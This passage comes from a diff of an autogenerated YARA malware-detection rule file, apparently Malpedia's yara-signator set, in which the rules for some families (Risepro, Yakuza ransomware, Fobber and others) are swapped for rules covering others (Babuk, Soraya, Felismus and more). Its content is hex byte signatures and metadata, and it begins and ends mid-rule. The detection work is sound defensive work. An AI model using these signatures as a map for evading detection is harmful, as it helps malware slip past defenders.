833d????????00 } + $sequence_5 = { 486bd258 490394c1a04b0100 f6423880 742c } + $sequence_6 = { 488bcb 488905???????? ff15???????? 488d1547d20000 488bcb 488905???????? ff15???????? } + $sequence_7 = { cc 4c8d05f8530000 498bd4 488bcd e8???????? 85c0 } + $sequence_8 = { 488b0d???????? eb7c 4c8d256a830000 488b0d???????? eb6c e8???????? } + $sequence_9 = { 488d0d50bf0000 ba01000000 e8???????? 4c8d442440 } condition: - 7 of them and filesize <663552 + 7 of them and filesize <198656 } -rule MALPEDIA_Win_Mail_O_Auto : FILE +rule MALPEDIA_Win_Vendetta_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f99f4969-80f4-597a-910e-873dc6aaa6b8" + id = "966ae160-05eb-53d3-b86d-ed42268f2f0c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mail_o_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vendetta_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "873a5557134df7611d1b518c4c6caa2026bc1ae07076d192a3e745c13ea47ee0" + logic_hash = "4fce9b15fe513b7322e530a7cc2cb9b1afb7d5162c1238338f15db6a45fbd5fd" score = 75 quality = 75 tags = "FILE" @@ -156367,32 +159064,32 @@ rule MALPEDIA_Win_Mail_O_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7707 33c0 e9???????? f683a414000020 7417 8b83700e0000 2500000100 } - $sequence_1 = { f20f104c2450 f20f114930 83cbff 8b0f e8???????? 8bc3 488b5c2470 } - $sequence_2 = { eb0c 488d15b7940d00 e8???????? 488b4708 488d542440 448b4710 33c9 } - $sequence_3 = { b920000000 ffcb ff542428 83f8ff 0f84b2010000 ffc7 85db } - $sequence_4 = { 8b5c2438 418d7f10 4533c0 498bce 3bfb 7e23 488d542440 } - $sequence_5 = { e8???????? eb17 498b4d10 4d8bf4 418bdc e8???????? eb06 } - $sequence_6 = { c744242071000000 448d4041 eb1f 488918 488bd0 488b4d08 e8???????? } - $sequence_7 = { 85c0 743c 48ffc3 483b5c2430 72c3 488bcf e8???????? } - $sequence_8 = { 84c0 7465 48ffc1 498d0408 483bc2 72df ba00800000 } - $sequence_9 = { e8???????? 8bf8 85c0 7556 48837c245000 7505 8d7809 } + $sequence_0 = { 8b04c5e06f4100 5d c3 33c0 5d } + $sequence_1 = { 83c408 84c0 0f845d010000 6a00 51 0bf9 } + $sequence_2 = { 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa30914100 } + $sequence_3 = { 83a500fcffff00 51 8d8df8fbffff e8???????? 898500fcffff } + $sequence_4 = { 8b4508 dd00 ebc6 c745e0d8924100 e9???????? c745e0e0924100 } + $sequence_5 = { 6a30 eb27 3bcb 7f0e 7c08 81fa0000800c 7704 } + $sequence_6 = { 7309 8b04c5e06f4100 5d c3 33c0 5d c3 } + $sequence_7 = { 85c0 7433 8bce e8???????? 8bf8 } + $sequence_8 = { 33c9 8bc1 3914c5b89b4100 7408 40 83f81d 7cf1 } + $sequence_9 = { 53 8d85f0f7ffff 50 56 } condition: - 7 of them and filesize <5985280 + 7 of them and filesize <296960 } -rule MALPEDIA_Win_Risepro_Auto : FILE +rule MALPEDIA_Win_Harnig_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aea6ceb4-8818-596f-b0ea-b016b3dee8c1" + id = "4db6d1ff-ae88-5c90-aeff-64f63eac36fc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.risepro_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.harnig_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "4bf4a4e2719baa2456fbc7c987c0d3507fd8f7c3c54ce53243c1cdc1f6723c61" + logic_hash = "278559dff9c1abda460af9efb2388b0afb57c006c8438cf3b67adcf26f15e5f4" score = 75 quality = 75 tags = "FILE" @@ -156406,32 +159103,32 @@ rule MALPEDIA_Win_Risepro_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb645ff 50 8b4de8 e8???????? 8b4dec 83c901 894dec } - $sequence_1 = { e8???????? 8945c8 8d4d0c e8???????? 8945cc 8d45d7 50 } - $sequence_2 = { 8bec 83ec0c 8955f8 894dfc 8b4dfc e8???????? 8bc8 } - $sequence_3 = { 894214 8b4df8 e8???????? 8945d4 837de010 } - $sequence_4 = { 8bcc 8965bc 8d552c 52 e8???????? 8945b8 c645fc04 } - $sequence_5 = { 33c0 8885eafeffff 33c9 888de9feffff } - $sequence_6 = { 6800000080 680000cf00 68???????? 68???????? 6800020000 ff15???????? 89859cfeffff } - $sequence_7 = { 6886e4fa74 6829895415 e8???????? 8b4dfc 894108 89510c } - $sequence_8 = { 33c5 8945ec 56 50 8d45f4 64a300000000 894da8 } - $sequence_9 = { 85ff 780f 3b3d???????? 7307 } + $sequence_0 = { c20800 6a05 ff742408 e8???????? c20400 53 } + $sequence_1 = { 8bca 8dbde8fbffff f3ab 8d45f0 50 8d85e8fbffff } + $sequence_2 = { ffd0 eb0b 68???????? ff15???????? 8bc8 } + $sequence_3 = { 03c1 5e c9 c20800 8b542404 8a0a 33c0 } + $sequence_4 = { 0bc6 5e c20800 6a05 } + $sequence_5 = { 56 8d85e0fdffff 50 ffd3 8d45e0 50 } + $sequence_6 = { 56 57 ba00010000 33c0 8bca 8dbde8f7ffff f3ab } + $sequence_7 = { 85c0 746b 8b45f8 68f1cbf7ae } + $sequence_8 = { ff5150 8b45fc 8b08 8d9524fdffff 52 8d9590feffff } + $sequence_9 = { 8a0a 33c0 84c9 7419 56 8bf0 } condition: - 7 of them and filesize <280576 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE +rule MALPEDIA_Elf_Babuk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "11a15f28-8d6d-50f2-ab84-992f1017bc03" + id = "0f03a128-b2bf-587f-bb2c-939b9b8a07cd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yakuza_ransomware_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.babuk_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "f6b4887f1e5f8fb585f51d15a1308ea3aa15725a1e02d02f26222a8f601e98de" + logic_hash = "1ffac28a8690c44fcc8b3792df7481d8deebcbe27a55524336d71b5e562fe261" score = 75 quality = 75 tags = "FILE" @@ -156445,32 +159142,32 @@ rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bd1 d1ea b8ffffff1f 2bc2 3bc8 7607 8bc3 } - $sequence_1 = { e8???????? 3b780c 730e 8b4008 8b34b8 85f6 0f85d7000000 } - $sequence_2 = { d1f8 837e1408 7202 8b36 50 ff7508 8bce } - $sequence_3 = { 6a01 6a01 57 8d4d80 e8???????? 8b4580 8d4d80 } - $sequence_4 = { 8d7018 83c030 8b11 03c7 50 03f7 56 } - $sequence_5 = { c745fcffffffff 56 8b4de0 41 51 53 8bcf } - $sequence_6 = { 8b4f14 8b5614 85c9 743e 85c0 750d e8???????? } - $sequence_7 = { eb17 0fb74644 8d4e24 50 e8???????? 6a2d 8d4e24 } - $sequence_8 = { 8b06 6a02 51 53 8d8d50ffffff 51 8bce } - $sequence_9 = { c745f000000000 c7461000000000 c7461407000000 668906 8945fc 8bc3 c745f001000000 } + $sequence_0 = { f7e2 89942488020000 898424a4000000 89e8 f7e1 89942484020000 898424a0000000 } + $sequence_1 = { 895c2404 e8???????? eba0 0fb6c1 3d88000000 0f8374020000 c1e007 } + $sequence_2 = { e8???????? 31c0 eb08 898c8490000000 40 83f806 7d5a } + $sequence_3 = { 8b9c2490000000 8d2c18 8d4c0314 8b942400010000 8b8424fc000000 8b9c24f8000000 39c1 } + $sequence_4 = { e8???????? e8???????? 8b442458 8b4018 c680b500000002 8b44247c 8b4c2478 } + $sequence_5 = { e8???????? 0fb644240c 84c0 7539 90 658b0500000000 8b80fcffffff } + $sequence_6 = { 8b492c 8b5c2414 01d3 895904 8b4818 8b492c } + $sequence_7 = { e8???????? e8???????? 658b0500000000 8b80fcffffff 8b4018 8b0c24 894824 } + $sequence_8 = { c1fd1f 21dd 8d3c2e 89bc24f8000000 8b6c2450 e9???????? 39f5 } + $sequence_9 = { 89442408 e8???????? 8b44240c 8b4c2410 890d???????? 890d???????? 8b15???????? } condition: - 7 of them and filesize <2811904 + 7 of them and filesize <4186112 } -rule MALPEDIA_Win_Fobber_Auto : FILE +rule MALPEDIA_Win_Campoloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ab54349a-7d99-57ef-92f9-d6c817ce7b6a" + id = "00b62c88-0d38-56b9-90a5-7c85290ffbe9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fobber_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.campoloader_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "16740b1e84557358ab17bd4ccf852daa4c4e1c0339646d5e9060d6d119fab8ab" + logic_hash = "dae472a7090c99e8a9ce136356f9bc867c42c508ecb59c9f6aa0187832a15e3c" score = 75 quality = 75 tags = "FILE" @@ -156484,38 +159181,32 @@ rule MALPEDIA_Win_Fobber_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89e5 51 8b4510 8b5508 8b4d0c 3002 c0c803 } - $sequence_1 = { 89e5 6a00 ff750c ff7508 e8???????? } - $sequence_2 = { 89e5 31c0 50 50 ff750c ff7508 50 } - $sequence_3 = { 57 51 8b7d08 30c0 31c9 f7d1 fc } - $sequence_4 = { e303 4f 89f8 5f 59 } - $sequence_5 = { 8b750c 8b4d10 39f7 760e 8d0431 39f8 7607 } - $sequence_6 = { 660fc146f9 6685c0 7515 0fb646f8 50 0fb746f6 } - $sequence_7 = { 55 89e5 6800800000 6a00 } - $sequence_8 = { 750f 0fb703 83f861 0f8301fe0000 } - $sequence_9 = { 57 33714b 8aa07b74cafc 16 aa 5a } - $sequence_10 = { 7527 e8???????? 83c020 3bf0 0f8434510100 e8???????? } - $sequence_11 = { 000f 843d???????? 328801008bff 55 8bec ff7514 6a00 } - $sequence_12 = { c00f84 40 17 0100 8b4d08 83600400 } - $sequence_13 = { 7706 6205???????? 294a75 f2149c 7674 } - $sequence_14 = { e8???????? 85f6 0f84fd610100 8b45d4 } - $sequence_15 = { 7508 e8???????? 59 59 5d c3 53 } + $sequence_0 = { 83ec1c a1???????? 33c5 8945fc a1???????? 8945e4 } + $sequence_1 = { 898d58efffff c78584efffff00000000 8d55f4 52 8b8558efffff 50 } + $sequence_2 = { ff15???????? ff15???????? 8b8584efffff 8b4dfc 33cd e8???????? } + $sequence_3 = { 8b9584efffff 039574efffff c60200 8b450c } + $sequence_4 = { ff15???????? 898550efffff 0fb78554efffff 50 } + $sequence_5 = { 038d8cefffff 898d74efffff e9???????? 8b9584efffff 039574efffff c60200 8b450c } + $sequence_6 = { ff15???????? 8945f8 68???????? 8b45fc 50 } + $sequence_7 = { 6a01 6a00 6a00 6800000040 8b4510 } + $sequence_8 = { 8b8558efffff 50 8d8df0feffff 51 } + $sequence_9 = { 8b8d70efffff 51 8b9584efffff 52 ff15???????? } condition: - 7 of them and filesize <188416 + 7 of them and filesize <66560 } -rule MALPEDIA_Win_Common_Magic_Auto : FILE +rule MALPEDIA_Win_Unidentified_078_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "51a78d88-2ba4-5106-aa0c-c758f14020ef" + id = "de8cdecb-4380-57eb-b923-e2ba443932e2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.common_magic_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_078_auto.yar#L1-L110" license_url = "N/A" - logic_hash = "b14e276c951448d5c194fa4cd51d59dbec4eb8aa1757a9205bc8d8e9186ff3cd" + logic_hash = "d08e32bbc4aa8e2920b084e5d720f452f9f589f09a38ee6e42b2e5fd17bef5f8" score = 75 quality = 75 tags = "FILE" @@ -156529,32 +159220,32 @@ rule MALPEDIA_Win_Common_Magic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d049d78824100 8b30 8945fc 90 } - $sequence_1 = { 03c0 eb3c 8bd1 b8feffff7f d1ea 2bc2 } - $sequence_2 = { c78578ffffff00000000 c7857cffffff00000000 8d9574ffffff c645fc09 8d8d84feffff } - $sequence_3 = { 6689855cffffff b8feffff7f 2bc1 c7856cffffff00000000 c78570ffffff07000000 } - $sequence_4 = { 33c9 8bc1 3914c5e84a4100 7408 } - $sequence_5 = { c7459c65007800 c745a065000000 83f817 0f82140c0000 83bd58ffffff08 8d8544ffffff } - $sequence_6 = { 51 50 51 ffb580feffff 8d8d5cffffff } - $sequence_7 = { 51 ffb580feffff 8d8d5cffffff e8???????? 838d78feffff06 8d8de4feffff 83bdf8feffff08 } - $sequence_8 = { 8b0c8570804100 8a043b 03ce 8b75dc 03cb 43 } - $sequence_9 = { 2bc2 3bc8 760e b8ffffff7f befeffff7f 03c0 } + $sequence_0 = { 7d21 8a440b10 3c5c 7419 } + $sequence_1 = { e8???????? 84c0 7467 f60701 } + $sequence_2 = { e9???????? 80fa5b 7f3c 80fa28 0f8d94010000 } + $sequence_3 = { 80fa0d 0f8421010000 80fa1b 0f8576010000 ba02000000 e8???????? } + $sequence_4 = { 80fa7e 0f8f02010000 e9???????? ba02000000 } + $sequence_5 = { b901010000 ff15???????? 85c0 740e e8???????? } + $sequence_6 = { 0f8cee000000 80fa0d 0f8421010000 80fa1b 0f8576010000 } + $sequence_7 = { 0f8f18010000 80fa23 0f8d82010000 ba02000000 } + $sequence_8 = { 753f a900004011 7521 a900000600 } + $sequence_9 = { 0f8d94010000 80fa26 0f8f18010000 80fa23 0f8d82010000 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <688128 } -rule MALPEDIA_Win_Rarstar_Auto : FILE +rule MALPEDIA_Win_Matsnu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b0cea37-0a1d-5e66-91fc-944e4e50541c" + id = "c9a7bdf6-1deb-5130-82f0-9b1058e504ad" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rarstar_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matsnu_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "2e522865d24e8dea587d8aa292c78791c9371361cc03d604920c80f6d8c9bb83" + logic_hash = "e4de93852a1879de4977ea1cd375165f9dcf6c32de8c352e98b35973d623758e" score = 75 quality = 75 tags = "FILE" @@ -156568,32 +159259,32 @@ rule MALPEDIA_Win_Rarstar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a5e01 83e203 c1fb04 c1e204 } - $sequence_1 = { 33d2 b903000000 f7f1 83c408 8bc6 } - $sequence_2 = { 85ed 7e6f 8a143e 83c703 c1fa02 83e23f 41 } - $sequence_3 = { 0f84c1010000 8b2d???????? 8b4c2434 8b54241c 6a00 } - $sequence_4 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 25ff000080 } - $sequence_5 = { ffd6 8d84241c020000 68???????? 50 ffd6 8d8c2424040000 68???????? } - $sequence_6 = { 8d8c2420030000 51 52 ffd5 8d842418010000 68???????? } - $sequence_7 = { 899c242c030000 899c2428030000 899c2424030000 899c2420030000 bf???????? 83c9ff } - $sequence_8 = { f7d1 2bf9 899c2430030000 8bc1 8bf7 8bfa } - $sequence_9 = { 8a9405ecfdffff 8890a0d74000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff } + $sequence_0 = { e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff 8985c4fbffff 8b85c0fbffff } + $sequence_1 = { eb04 c647023d 837d1003 7213 } + $sequence_2 = { eb04 c647023d 837d1003 7213 31c0 8a4602 243f } + $sequence_3 = { 8b45e0 3b450c 0f8391000000 c745e800000000 } + $sequence_4 = { 750f c785a4fbffff02000000 e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff } + $sequence_5 = { 85c0 0f84a6000000 8945fc 8b45e0 3b450c } + $sequence_6 = { c78570f3ffff00000000 c78574f3ffff00000000 c78578f3ffff00000000 c7857cf3ffff00000000 } + $sequence_7 = { 751d ff45da ba00000000 8b45da } + $sequence_8 = { 3b45ba 7228 8b7d08 8b4704 3b45ba 751d } + $sequence_9 = { 89e5 81ec18020000 c785e8fdffff00000000 c785ecfdffff00000000 c785f0fdffff00000000 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <606992 } -rule MALPEDIA_Win_Yorekey_Auto : FILE +rule MALPEDIA_Win_Cmsbrute_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0c2854a9-311b-528a-8d3c-9008975025f5" + id = "8f79cbd4-e913-5f2c-8c88-b934c5aa8f71" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yorekey_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cmsbrute_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "bfaa0e3abe9f69e663c8e7749df7b846bcbaa395b01b91bd4c5c56f646e51121" + logic_hash = "9b2fd3bf8cbe0036d7312658e08a3f69e7f5e49973eb02bc9f177311ac61fa60" score = 75 quality = 75 tags = "FILE" @@ -156607,39 +159298,34 @@ rule MALPEDIA_Win_Yorekey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 750a 85c0 7506 ff15???????? } - $sequence_1 = { 4883ec20 33ff 488d1dc9fa0000 488b0b ff15???????? } - $sequence_2 = { 33c9 ff15???????? 488bd8 ff15???????? 3db7000000 7509 } - $sequence_3 = { 8bc6 83f801 7521 a1???????? 50 ff15???????? 68???????? } - $sequence_4 = { 03048de0404100 eb02 8bc2 f6402480 0f8571ffffff 33f6 3bfe } - $sequence_5 = { 4803d1 488d0d02090100 442bc6 488b0cc1 498b0c0c ff15???????? 85c0 } - $sequence_6 = { 7530 a1???????? ba???????? 50 e9???????? a1???????? } - $sequence_7 = { 488bce e8???????? 488d154c040100 4c63c8 418d4902 } - $sequence_8 = { 730d 488bd3 488bcf e8???????? eb1c } - $sequence_9 = { 751b 6a02 33c9 51 } - $sequence_10 = { 7405 6641894d00 4885f6 7457 483bf7 7252 4d85ff } - $sequence_11 = { 898570ffffff 89856cffffff 8d4598 b919000000 } - $sequence_12 = { ff15???????? 488d44243c 448d4f04 4889442428 4c8d05cbfaffff } - $sequence_13 = { 5a 8985c4fbffff 3bc2 0f8451ffffff 83f807 0f87110a0000 ff2485b19b4000 } - $sequence_14 = { 55 8bec 51 8bc2 56 8d7002 8d9b00000000 } + $sequence_0 = { ff7004 51 ff7510 8b4d08 ff750c 56 e8???????? } + $sequence_1 = { e8???????? ff4de0 8bde 75e4 8b75d8 832700 6a00 } + $sequence_2 = { ffb068010000 ff15???????? 8b06 83a06801000000 8b442418 59 59 } + $sequence_3 = { eb0f e8???????? 59 50 8d75b4 e8???????? 59 } + $sequence_4 = { eb02 8b01 3945fc 0f8d8a000000 8b45fc e8???????? 8bf0 } + $sequence_5 = { ff75c4 8b4dcc ff75d4 8bd8 0fb7463e 50 53 } + $sequence_6 = { eb02 33ff 8bb59cfdffff 51 e8???????? 59 85ff } + $sequence_7 = { ff75e4 57 e8???????? 83c414 85c0 7425 8bf7 } + $sequence_8 = { ff742430 e8???????? 89442430 8b4304 8378041b 8b30 8b7808 } + $sequence_9 = { ff15???????? 8945cc 8b35???????? 83cfff 3bdf 7403 53 } condition: - 7 of them and filesize <274432 + 7 of them and filesize <5275648 } -rule MALPEDIA_Win_Electric_Powder_Auto : FILE +rule MALPEDIA_Win_Soraya_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6da8b24a-07fd-5fc6-a509-6cbc31d92594" + id = "17c03046-2ad1-5623-9130-def458833386" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.electric_powder_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soraya_auto.yar#L1-L230" license_url = "N/A" - logic_hash = "38cd56e857c27f71ed9be956ee8235c5f49da7b5b360cadbe53a42a73ba8199e" + logic_hash = "43793169adfc64c624ebc876524a7869403686546a466d508c127ca9f78faaa7" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -156651,34 +159337,47 @@ rule MALPEDIA_Win_Electric_Powder_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3b4e08 0f8324010000 8b4604 c704c810000000 8b4608 83e801 8945fc } - $sequence_1 = { 03c0 660f289800904300 660f2835???????? 660f59cf 660f58d1 660f70caee f20f59d7 } - $sequence_2 = { 8d8d20fdffff c78530fdffff00000000 c78534fdffff0f000000 c68520fdffff00 e8???????? c745fc00000000 8d8d20fdffff } - $sequence_3 = { 7202 8b39 8b4110 85c0 7449 48 83ceff } - $sequence_4 = { 0f8389010000 8b5604 3bc8 0f8388010000 8b44fa04 8944ca04 } - $sequence_5 = { c645fc20 51 8bd0 8d8d78fcffff e8???????? 83c404 68???????? } - $sequence_6 = { 50 51 8d8d68faffff e8???????? 83bd7cfaffff08 8d8568faffff } - $sequence_7 = { 7202 8b3f 83fa08 731a } - $sequence_8 = { 83c404 89b518efffff 85f6 0f84be000000 8b8d40efffff 03c9 } - $sequence_9 = { 83f8ff 773b 83f8ef 7736 8b4f04 83c010 50 } + $sequence_0 = { ff15???????? 8d48bf 80f919 77f2 } + $sequence_1 = { e8???????? 488d151af0ffff 488d8d60020000 ff15???????? e8???????? 488d8d60020000 488bd0 } + $sequence_2 = { 57 8bd8 56 53 e8???????? 8b733c } + $sequence_3 = { 33c1 99 b99a000000 f7f9 b8fe340000 } + $sequence_4 = { 488bd0 4c8b4850 498bcb 41b86b000000 } + $sequence_5 = { 41b800300000 ff15???????? 488b8d50010000 4c8d8d48010000 488bd8 488d8540010000 488d1565f4ffff } + $sequence_6 = { 8b4c2414 33c6 33ce 03c1 } + $sequence_7 = { 418bd6 3bcb 72c8 4c891d???????? 488d0d1fe0ffff } + $sequence_8 = { 894df4 0f8501010000 53 56 8b7178 } + $sequence_9 = { 8b4a0c 8b7210 03c8 8365fc00 8b55fc ff45fc } + $sequence_10 = { 488d0dfadfffff ff15???????? 488bc8 e8???????? 488d0df5dfffff ff15???????? 488d15f8dfffff } + $sequence_11 = { 689b558d52 6853d56c36 68ff555535 68f9d6feff 6888888868 } + $sequence_12 = { 8b45ec 2bf8 037d10 8b45e8 } + $sequence_13 = { 2bd0 894de0 3bd1 7649 8b55f8 33d6 } + $sequence_14 = { 03570c 034f0c 807df800 8a540203 8a4c0102 8855fb } + $sequence_15 = { 8b3d???????? 6a1c 8d45e0 50 6a00 } + $sequence_16 = { 7444 53 4883ec30 488bd9 b910270000 ff15???????? 8364242800 } + $sequence_17 = { 488d0d73f8ffff 498bd8 488bfa ff15???????? } + $sequence_18 = { 56 57 8d85fcfdffff 6800020000 50 e8???????? } + $sequence_19 = { ff45dc 295de0 4e 75e8 b844060000 0345c8 } + $sequence_20 = { 7424 56 6a00 683a040000 ff15???????? 8bf0 85f6 } + $sequence_21 = { 8dbc07fe3ef2ff 8b45d8 33c6 3bbc05be3ef2ff 0f82bdfdffff } + $sequence_22 = { 8b45fc 8b4dec 8b4508 8b9578ffffff 8b80d8010000 33d3 } condition: - 7 of them and filesize <565248 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Ketrican_Auto : FILE +rule MALPEDIA_Win_Felismus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03c6cec7-6d12-51a2-b1a9-8239f834bf9b" + id = "5818ed3f-2431-5f26-88a0-82a8f566adf3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ketrican_auto.yar#L1-L227" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.felismus_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c6a0e9c9ef6d7c9c9c9505df3e47863f2b32a94701647f7dc167a7885087d327" + logic_hash = "dea5875d596c4ef87d002c63282ac83d0f7df95527f5e0d6e66faa21ccc2e20e" score = 75 - quality = 71 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -156690,45 +159389,32 @@ rule MALPEDIA_Win_Ketrican_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8965f0 33db 895dfc 33c0 } - $sequence_1 = { 7417 6a0a 6a1f 68???????? } - $sequence_2 = { e8???????? 83c010 8906 c3 56 } - $sequence_3 = { 8bd1 e8???????? 5f 5e c3 55 8bec } - $sequence_4 = { 8b06 5d c20400 55 8bec 8b4508 894508 } - $sequence_5 = { 8bc1 8945f0 834dfcff e8???????? } - $sequence_6 = { 8901 5b 5d c20800 680e000780 e8???????? cc } - $sequence_7 = { 680e000780 e8???????? cc 8b06 83e810 8b08 } - $sequence_8 = { 48 7445 48 743a 48 } - $sequence_9 = { 884603 83c604 8345f804 8b45f8 5f } - $sequence_10 = { 58 668945d8 6a72 58 } - $sequence_11 = { 6a00 8d85f1fbffff 50 e8???????? 83c40c 6800040000 } - $sequence_12 = { ff7508 53 53 ffd6 5f 5e } - $sequence_13 = { 740a 48 754a e8???????? } - $sequence_14 = { 83c002 663bd3 75f5 2bc1 d1f8 8d7001 6800080200 } - $sequence_15 = { e8???????? 8b8a8c2f0000 33c8 e8???????? b8???????? } - $sequence_16 = { ff15???????? 68???????? c705????????98824100 a3???????? } - $sequence_17 = { 8d420c 8b4ae8 33c8 e8???????? 8b8a4c010000 } - $sequence_18 = { 33c8 e8???????? 8b8ae8080000 33c8 e8???????? } - $sequence_19 = { 8d4dd0 e9???????? 8d4de0 e9???????? 8d4db8 e9???????? 8d4ddc } - $sequence_20 = { b8???????? e9???????? 8b542408 8d420c 8b8aa4feffff 33c8 } - $sequence_21 = { c705????????98824100 a3???????? c605????????00 e8???????? 59 } - $sequence_22 = { 8b8a54ffffff 33c8 e8???????? 8b8adc090000 33c8 e8???????? } + $sequence_0 = { ff15???????? 8b35???????? 83c404 53 ffd6 8b442410 } + $sequence_1 = { 8b4e08 8b560c 89442418 8b4610 894c241c 89442424 } + $sequence_2 = { 89542410 8b5110 56 2be8 57 89542420 bb01000000 } + $sequence_3 = { 8d5640 8bfa f3ab 8b4618 33c9 85c0 7e24 } + $sequence_4 = { 66ab aa b940000000 33c0 8dbc24b1050000 } + $sequence_5 = { 85c0 740f 